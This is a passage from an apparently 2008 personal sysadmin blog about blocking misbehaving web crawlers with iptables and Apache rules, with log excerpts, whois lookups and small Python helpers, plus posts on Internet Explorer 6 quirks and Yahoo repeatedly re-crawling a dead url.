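    syn: bool = False
    ack: bool = False
    rst: bool = False
    fin: bool = False

def is_syn_only(seg):
    """Equivalent of iptables --syn: SYN set, ACK/RST/FIN cleared."""
    return seg.syn and not (seg.ack or seg.rst or seg.fin)

def rejected(seg):
    """Model of '-p tcp ! --dport 25 --syn -j REJECT' for a matching source."""
    return seg.dport != 25 and is_syn_only(seg)

print(rejected(Segment(dport=80, syn=True)))               # new HTTP connection
print(rejected(Segment(dport=25, syn=True)))               # inbound mail
print(rejected(Segment(dport=40000, syn=True, ack=True)))  # SYN-ACK answering our outgoing mail
```

Only the first case is rejected. The SYN-ACK coming back from their mailserver carries the ACK flag and therefore slips past the rule, which is what keeps outgoing mail from getting stuck.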

Apache servers may also be happy about another SetEnvIf rule, preferably in httpd.conf/apache2.conf, or in .htaccess if the former is not an option due to a shared hosting account:

SetEnvIfNoCase User-Agent "WebDataCentre(Bot|\.com)" block

Deny from env=block
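The pattern can be tried out against a few user agent strings before it goes live. This is a rough Python equivalent, assuming that a case-insensitive, unanchored search comes close enough to what SetEnvIfNoCase does with the expression; BLOCK and is_blocked_agent are names made up for the example.

```python
import re

# Same expression as in the SetEnvIfNoCase line, matched case-insensitively
BLOCK = re.compile(r"WebDataCentre(Bot|\.com)", re.IGNORECASE)

def is_blocked_agent(user_agent):
    """True if the pattern occurs anywhere in the user agent string."""
    return BLOCK.search(user_agent) is not None

print(is_blocked_agent("Mozilla/5.0 (compatible; WebDataCentreBot/1.0; +http://WebDataCentre.com/)"))
print(is_blocked_agent("Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"))
```

Of course a user agent match only helps as long as the bot keeps announcing itself honestly, which is why the firewall rule remains the more robust option.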

Update July 1st, 2008:

The bot has been spotted with another ip address, 66.150.224.245, this time without any rDNS record at all:

olliver@bunkiten:~$ host 66.150.224.245
Host 245.224.150.66.in-addr.arpa. not found: 3(NXDOMAIN)

Familiar setup: within a /24 of a presumable Internap reseller and still without any details concerning the company/project.

CustName:   Networld Internet Services
Address:    P.O box 551
City:       Skippack
StateProv:  PA
PostalCode: 19474
Country:    US
RegDate:    2007-01-16
Updated:    2007-01-16

NetRange:   66.150.224.0 - 66.150.224.255
CIDR:       66.150.224.0/24
NetName:    INAP-PHI-NETWORLDINT-12098
NetHandle:  NET-66-150-224-0-1
Parent:     NET-66-150-0-0-1
NetType:    Reassigned
Comment:
RegDate:    2007-01-16
Updated:    2007-01-16

RTechHandle: INO3-ARIN
RTechName:   InterNap Network Operations Center
RTechPhone:  +1-877-843-4662
RTechEmail:  noc @ internap.com 

OrgAbuseHandle: IAC3-ARIN
OrgAbuseName:   Internap Abuse Contact
OrgAbusePhone:  +1-206-256-9500
OrgAbuseEmail:  abuse @ internap.com

OrgTechHandle: INO3-ARIN
OrgTechName:   InterNap Network Operations Center
OrgTechPhone:  +1-877-843-4662
OrgTechEmail:  noc @ internap.com

In case you want to add another iptables rule based on the sample further above, simply replace 67.228.177.0/24 with 66.150.224.0/24 and you should be set.

Update July 4th, 2008

Another sighting, this time crawling from Sweden using 77.110.52.67 as ip address:

olliver@bunkiten:~$ host 77.110.52.67
67.52.110.77.in-addr.arpa is an alias for 77-110-52-67.univation.riksnet.nu.
77-110-52-67.univation.riksnet.nu domain name pointer ip67.univation.riksnet.nu.

So the pattern of using generic rDNS records obviously persists, as does their disregard for robots.txt.

Whois:

inetnum:        77.110.52.64 - 77.110.52.79
netname:        SE-RIKSNET-UNIVATION2
descr:          Stockholm Univation AB site2
country:        SE
admin-c:        BEER3-RIPE
tech-c:         BEER3-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-RIKSNET
mnt-lower:      MNT-RIKSNET
mnt-routes:     MNT-RIKSNET
source:         RIPE # Filtered

person:         Bengt Erik Sandstrom
address:        Graddvagen 7
address:        S-906 20 Umea
address:        Sweden
phone:          +46 768 272022
nic-hdl:        BEER3-RIPE
source:         RIPE # Filtered

That range translates to 77.110.52.64/28, a rather small block this time, and this is also the value you would want to use for blocking them via iptables or other means.
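If you do not want to work out the prefix length by hand, the conversion from a whois range to CIDR notation can be sketched in a few lines of Python. The helper name `range_to_cidr` is my own; the two ranges are the ones from the whois records above.

```python
import ipaddress


def range_to_cidr(first: str, last: str) -> list:
    """Return the CIDR block(s) that exactly cover first..last (inclusive)."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last)
    )
    return [str(net) for net in nets]


print(range_to_cidr("77.110.52.64", "77.110.52.79"))    # ['77.110.52.64/28']
print(range_to_cidr("66.150.224.0", "66.150.224.255"))  # ['66.150.224.0/24']
```

A range that does not start on a suitable boundary comes back as several blocks, so the result is a list.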

Comments (14)

March 10th, 2008

BioSearch bot: pointless POST requests

Filed under: Web — olliver @ 23:52 h

I really do not know what this bot is trying to accomplish, but it looks rather pointless:

66.167.105.59 - - [10/Mar/2008:04:47:50 +0100]
"POST / HTTP/1.1" 403 210 "-" "BioSearch"
66.167.105.59 - - [10/Mar/2008:04:47:51 +0100]
"POST /robots.txt HTTP/1.1" 403 220 "-" "BioSearch"

POST is meant for submitting data such as forms, not for retrieving pages. Apart from that, the request order is wrong: a bot should first ask for robots.txt and then, depending on the outcome, either go away or start indexing.

Unfortunately the netblock where this brainless wonder resides does not reveal any details about the bot’s owner:
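For comparison, this is roughly the decision I would expect from a well-behaved bot. It is a sketch using Python's standard `urllib.robotparser`; the robots.txt content and the example.com url are made up, and the rules are fed in as a list of lines so the example runs without network access. A real crawler would fetch the file with a plain GET, for instance via `set_url()` and `read()` on the same parser object.

```python
from urllib import robotparser


def allowed(robots_lines, user_agent, url):
    """Decide from robots.txt rules whether user_agent may fetch url."""
    rp = robotparser.RobotFileParser()
    rp.parse(robots_lines)  # in a live crawler: rp.set_url(...); rp.read()
    return rp.can_fetch(user_agent, url)


# Hypothetical robots.txt that shuts out one bot and says nothing about others.
robots_txt = [
    "User-agent: BioSearch",
    "Disallow: /",
]

print(allowed(robots_txt, "BioSearch", "http://www.example.com/"))     # False
print(allowed(robots_txt, "SomeOtherBot", "http://www.example.com/"))  # True
```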

[rwhois.covad.net]
%rwhois V-1.5:003fff:00 rwhois.covad.com (by Network Solutions, Inc. V-you-guess)
network:Class-Name:network
network:Auth-Area:66.167.0.0/16
network:ID:NETBLK-NONE-66-167-0-0.66.167.0.0/16
network:Network-Name:NONE-66-167-0-0
network:IP-Network:66.167.0.0/16
network:In-Addr-Server;I:ns3.covad.com
network:In-Addr-Server;I:ns4.covad.com
network:IP-Network-Block:66.167.0.0 - 66.167.255.255
network:Org-Name:Covad Communications
network:Street-Address:110 Rio Robles
network:City:San Jose
network:State:CA
network:Postal-Code:95134
network:Country-Code:US
network:Tech-Contact;I:ipadmin covad.com
network:Admin-Contact;I:ipadmin covad.com
network:Created:20030508150409000
network:Updated:20041506165200000

The rDNS of the offending ip address is no more talkative either:
h-66-167-105-99.lsanca54.dynamic.covad.net
This reads to me like Los Angeles/California.

Although there is a company in California called Biosearch Technologies, they are unrelated to the bot, as they only offer products derived from their biological research and are based in the San Francisco area. So it seems to be just a broken anonymous bot which is safe to block.

Comments (0)

January 22nd, 2008

IE 6.0 omits trailing slash for webroot requests

Filed under: Web — olliver @ 10:53 h

Just when you think it could not happen, it does anyway…
I have just discovered that Internet Explorer 6.0 has the habit of omitting the trailing slash of a domain name whenever it is not explicitly appended in a request. This only happens for requests of the webroot (like www.example.com), because in all other cases Apache will automatically issue a 301 redirect to the url version with a trailing slash. This is irritating to me because all other browsers will automatically add the trailing slash if it is missing.

Here are some log entries to illustrate what it looks like when you omit the slash of the domain name:

192.168.0.16 - - [22/Jan/2008:09:42:11 +0100] "GET / HTTP/1.1"
200 41369 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.168.0.16 - - [22/Jan/2008:09:42:13 +0100]
"GET /wp-content/themes/nodepet/style.css HTTP/1.1"
304 - "http://www.nodepet.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Note the referrer string in the last line: it lacks the trailing slash. By sending this broken referrer string, IE is likely to break scripts which rely on the usual behaviour (e.g. referrer checks against hotlinking or script automation) and deny access to legit visitors. Curiously, if you do add the slash to your request from the start, IE 6.0 will behave like any other browser:

192.168.0.1 - - [22/Jan/2008:09:48:16 +0100] "GET / HTTP/1.1"
200 41369 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.168.0.1 - - [22/Jan/2008:09:48:17 +0100]
"GET /wp-content/themes/nodepet/style.css HTTP/1.1"
304 - "http://www.nodepet.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

Up to now I thought a missing slash was a good indicator for a bot generated fake referrer and would make a good SetEnvIf rule to deny access on. However, it now seems that this approach generates false positives. On the other hand, by loosening the check I open up the floodgates for spambots, which is not really something I am keen on.
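The check in question can be sketched in Python like this. It is not my actual SetEnvIf rule, just the same idea spelled out: a referrer that consists of scheme and host only, without any path, gets flagged. The function name is made up.

```python
from urllib.parse import urlsplit


def is_bare_host_referrer(referrer: str) -> bool:
    """True for referrers like 'http://www.example.com' (host, but no path at all)."""
    if not referrer or referrer == "-":
        return False  # no referrer sent; that is a different case altogether
    parts = urlsplit(referrer)
    return bool(parts.netloc) and parts.path == ""


print(is_bare_host_referrer("http://www.nodepet.com"))   # True
print(is_bare_host_referrer("http://www.nodepet.com/"))  # False
```

The first call is exactly what IE 6.0 sends in the log excerpt further up, so a rule built on this test cannot tell that browser from a spambot.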

Comments (0)

January 11th, 2008

IE6.0 bug: horizontal scrollbars using italic fonts

Filed under: Web — olliver @ 16:22 h

I came across this weird bug whilst tweaking my site and could not find any website mentioning it. Or maybe I am too silly to use the right wording for my search queries as I cannot imagine that I am the first person to have noticed it.

First off, my layout here complies with XHTML 1.0 Strict. It would even validate as XHTML 1.1 after a minor configuration change on my web server (so that it uses a different mime type for html documents). The CSS file I use also validates without the slightest warning. Now to the description:
Whenever a block element contains an embedded <i> or <em> tag (to mark a quote, for example), or is itself styled as italic, and its text stretches over multiple lines, IE 6.0 on Windows will freak out and add horizontal scrollbars without a visible cause. These bars disappear as soon as I remove italic from the offending style or the embedded <i> or <em> tag from the affected block element.

Perhaps someone incidentally reading this post knows how to work around this problem or has a link pointing to a working hack? Any hint would be greatly appreciated, as I really would like to learn what exactly is causing this issue.

Comments (4)

January 9th, 2008

Radian6 – an abusive crawler from Canada

Filed under: Web — olliver @ 14:42 h

The above headline might be confusing, because at first glance Radian6 obeys robots.txt. However, once it is blocked by a server, it switches its user agent to some generic Java client and continues indexing. Anyway, before I go on, let me first introduce you to Radian6, its origins and purposes:

Radian6 is a crawler from Canada and its purpose becomes clear just by looking at the first lines on its home page:

Millions of blog posts. Viral videos. Reviews in forums. Sharing of photos. Status updates via microblogging. All conversations, all happening online right now and affecting brands, reputations, sales, you name it.

This is classic marketing speak at its best. And right, the company behind Radian6 provides marketing and promotion professionals with the latest “trends” in the blogosphere, so their customers can pick them up and modify their advertising campaigns accordingly, as you can read on this page. To me this boils down to bullying sites with a PR machinery, pushing them aside into irrelevance and snatching trends and slogans for corporate advertising or promo campaigns. All fine and dandy, but who am I to support the advertising industry by providing keywords they can eventually use against me? The bot is of no benefit to me, as I do not get to see its index unless I pay for it. Add the fact that Radian6 shows broken crawling behaviour, pulling the same content multiple times a day and omitting trailing slashes in urls (resulting in even more wasted traffic, as each such request has to be redirected to the actual location), and the only conclusion for me is to deny this bot. And on my server that means 403 Forbidden:

142.166.3.122 - - [09/Jan/2008:03:20:01 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.122 - - [09/Jan/2008:06:39:35 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.123 - - [09/Jan/2008:09:46:53 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"
142.166.3.122 - - [09/Jan/2008:12:50:18 +0100]
"GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"

Now one would think that at some point a legitimate bot would give up and move on to more commerce friendly hosts. But that turned out to be wishful thinking, as the bot seems to have inherited a mental deficiency that prevents it from accepting that someone does not want to see it:

142.166.3.122 - - [09/Jan/2008:03:19:26 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:19:27 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:19:28 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:03:20:01 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:06:39:33 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:06:39:34 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:50 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:51 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:09:46:53 +0100]
"GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:12:50:16 +0100]
"GET /a-new-release-i-finally-got-started HTTP/1.1" 301 5 "-" "Java/1.5.0_11"
142.166.3.122 - - [09/Jan/2008:12:50:17 +0100]
"GET /a-new-release-i-finally-got-started/ HTTP/1.1" 200 9582 "-" "Java/1.5.0_11"

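Spotting such a change of costume by eye gets tedious in larger logfiles. Below is a minimal Python sketch that lists every ip address which showed up with more than one user agent. It assumes the combined log format with each entry on a single line (I wrapped the entries above for readability), and the function names are my own.

```python
import re
from collections import defaultdict

# Combined log format: ip, identity, user, [time], "request", status, size,
# "referrer", "user agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def agents_by_ip(lines):
    """Map each client ip to the set of user agents it presented."""
    seen = defaultdict(set)
    for line in lines:
        match = LOG_LINE.match(line.strip())
        if match:  # silently skip lines in another format
            seen[match.group("ip")].add(match.group("agent"))
    return seen


def agent_switchers(lines):
    """Return only those ips that used more than one user agent."""
    return {ip: agents for ip, agents in agents_by_ip(lines).items() if len(agents) > 1}


# Three entries from the excerpts above, joined onto one line each.
log = [
    '142.166.3.122 - - [09/Jan/2008:03:19:26 +0100] "GET /robots.txt HTTP/1.1" 200 77 "-" "Java/1.5.0_11"',
    '142.166.3.122 - - [09/Jan/2008:03:20:01 +0100] "GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"',
    '142.166.3.123 - - [09/Jan/2008:09:46:53 +0100] "GET /feed/ HTTP/1.1" 403 215 "-" "R6_FeedFetcher_(www.radian6.com/crawler)"',
]

for ip, agents in agent_switchers(log).items():
    print(ip, sorted(agents))
```

Several user agents per address are not proof of bad intent, since proxies and NAT gateways produce the same picture, so I would treat the output as a list of candidates for a closer look.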
Why is it that some outfits in the promotion and marketing industry (and their most radical variant called “spammers”) have such a disregard for individuals and believe everyone gladly accepts their “message blast” if it is only repeated often enough? Why do they cherish the delusion of being special, exempt from common ethical standards and more gifted and intelligent than their targeted “consumer base”? I assume they do not take such questions into consideration or accept opinions contrary to theirs, therefore I decided to add the netblock 142.166.0.0/16 to my growing list of firewalled ip ranges to prevent any more “stealth visits”.

In case you wish to opt out from their visits too, simply add the following line to your .htaccess or httpd.conf file:

Deny from 142.166.0.0/16

Or, in case you are fortunate enough to run a dedicated server and do not expect any welcome visitors from that ip allocation, you may prefer to firewall their range right away:

iptables -A INPUT -s 142.166.0.0/16 -i eth0 -p tcp -m tcp ! --dport 25 -j DROP

This rule leaves port 25 (SMTP) open as a communication channel. Since this is a rather large chunk of addresses, it may well contain responsible companies and individuals and for those I still want to be reachable via email. Of course, if you do not have any such concerns you can also apply the BOFH method and silence this range entirely:

iptables -A INPUT -s 142.166.0.0/16 -i eth0 -p tcp -j DROP
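Before loading a rule like this it does not hurt to verify that the block really covers the addresses seen in the logs, because a single mistyped octet goes unnoticed all too easily. A quick Python sketch with the two crawler addresses from the excerpts above (the helper name is made up):

```python
import ipaddress

CRAWLER_IPS = ["142.166.3.122", "142.166.3.123"]  # taken from the log excerpts


def covered(ips, cidr):
    """True if every address in ips lies inside the given CIDR block."""
    net = ipaddress.ip_network(cidr)
    return all(ipaddress.ip_address(ip) in net for ip in ips)


print(covered(CRAWLER_IPS, "142.166.0.0/16"))  # True
print(covered(CRAWLER_IPS, "142.66.0.0/16"))   # False, one digit short
print(ipaddress.ip_network("142.166.0.0/16").num_addresses)  # 65536
```

The last line also shows why I call this a rather large chunk: a /16 silences 65536 addresses at once.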
Comments (2)

January 7th, 2008

Yahoo loves kurzfilm and can’t let it go…

Filed under: Web — olliver @ 22:01 h

This romance started back in December:
One fine day, shortly before Christmas, I noticed some weird requests by Yahoo’s crawler:

74.6.28.164 - - [23/Dec/2007:08:25:16 +0100] "GET /kurzfilm/ HTTP/1.0" 301 307 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [23/Dec/2007:08:25:17 +0100] "GET /kurzfilm/ HTTP/1.0" 404 275 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Of course there was no directory called “kurzfilm” on my server, but it seemed some stale link was pointing to it and Yahoo checked to see whether there was something new to discover. If you look closely, you will spot a 301 redirect before the actual 404 response. That is because I use mod_rewrite to redirect any request that does not use “www.mydomain.com” as host to that location first, to ensure that only this version of my domains appears in search results. After some research I was even able to locate the origin: some Dutch website used to link to it using the server’s ip address. Unfortunately this was a fatal mistake, as Yahoo is now querying this non-existent “kurzfilm” directory over and over again.
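To make the 301-then-404 sequence easier to follow, here is the decision logic as a small Python model. It is not my actual mod_rewrite configuration, only a sketch of the behaviour described above; the host name, the documentation ip address 192.0.2.10 and the set of existing paths are placeholders.

```python
CANONICAL_HOST = "www.example.com"  # placeholder for the real host name
EXISTING_PATHS = {"/", "/feed/"}    # hypothetical, stands in for the real site


def respond(host, path):
    """Return (status, location) for a request, canonical host check first."""
    if host != CANONICAL_HOST:
        # Wrong or missing host: send the client to the canonical name,
        # without checking whether the path exists at all.
        return 301, "http://" + CANONICAL_HOST + path
    if path not in EXISTING_PATHS:
        return 404, None
    return 200, None


print(respond("192.0.2.10", "/kurzfilm/"))       # (301, 'http://www.example.com/kurzfilm/')
print(respond("www.example.com", "/kurzfilm/"))  # (404, None)
```

Because the host check comes first, even a request for a non-existent path is redirected before the server gets to say that there is nothing there.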

Google behaves differently in that regard: Once it cannot find anything there it soon discards the url and moves on. Also it obeys 301 (moved permanently) redirects and discards the previous destination after a while. But Yahoo?

Yahoo loves “kurzfilm” in the morning:

74.6.28.164 - - [06/Jan/2008:09:08:59 +0100] "GET /kurzfilm/ HTTP/1.0" 301 236 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [06/Jan/2008:09:09:01 +0100] "GET /kurzfilm/ HTTP/1.0" 404 5883 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

And “kurzfilm” in the evening:

74.6.28.164 - - [06/Jan/2008:20:02:50 +0100] "GET /kurzfilm/ HTTP/1.0" 301 236 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.28.164 - - [06/Jan/2008:20:02:52 +0100] "GET /kurzfilm/ HTTP/1.0" 404 5883 "-"
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"

Did you notice the 301 redirect? That means Yahoo is still using the server’s ip address for its request, although a 301 redirect should normally signal that all future requests go to the new destination instead. But then again it would not be Yahoo otherwise, and so I shall expect to find “kurzfilm” in my logfiles around this time next year, too. Maybe I should create this “kurzfilm” directory already, just for Yahoo: The “kurzfilm” search engine # 1 :-).

Comments (0)
